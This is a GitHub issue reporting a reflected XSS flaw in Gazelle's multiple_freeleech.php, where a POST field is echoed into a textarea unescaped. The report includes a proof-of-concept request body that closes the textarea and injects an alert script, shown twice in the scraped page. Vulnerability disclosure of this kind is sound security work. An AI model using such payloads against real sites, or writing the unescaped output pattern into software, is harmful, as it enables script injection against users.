We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hello,
I would like to report for a XSS vulnerability in gazelle commit 63b3370
In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/multiple_freeleech.php
... <textarea name="torrents" style="width: 95%; height: 200px;"><?=$_POST['torrents']?></textarea><br /><br /> // Line 96 ...
Source from $_POST['torrents'] without any filtering or checking which resulting in XSS.
$_POST['torrents']
POST /sections/tools/managers/multiple_freeleech.php
With the Data
torrents=</textarea>%3Cscript%3Ealert(1);%3C/script%3E<textarea>
BTW,cms.gazelle.com in local(changes hosts)
The text was updated successfully, but these errors were encountered:
Same as my comment submitted two instances ago; as an old timer who began in gazelle, codeigniter and laravel I applaud your analysis and disclosure.
Sorry, something went wrong.
No branches or pull requests
Hello,
I would like to report for a XSS vulnerability in gazelle commit 63b3370
In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/multiple_freeleech.php
Source from
$_POST['torrents']
without any filtering or checking which resulting in XSS.Poc
POST /sections/tools/managers/multiple_freeleech.php
With the Data
torrents=</textarea>%3Cscript%3Ealert(1);%3C/script%3E<textarea>
Manual verification
BTW,cms.gazelle.com in local(changes hosts)
The text was updated successfully, but these errors were encountered: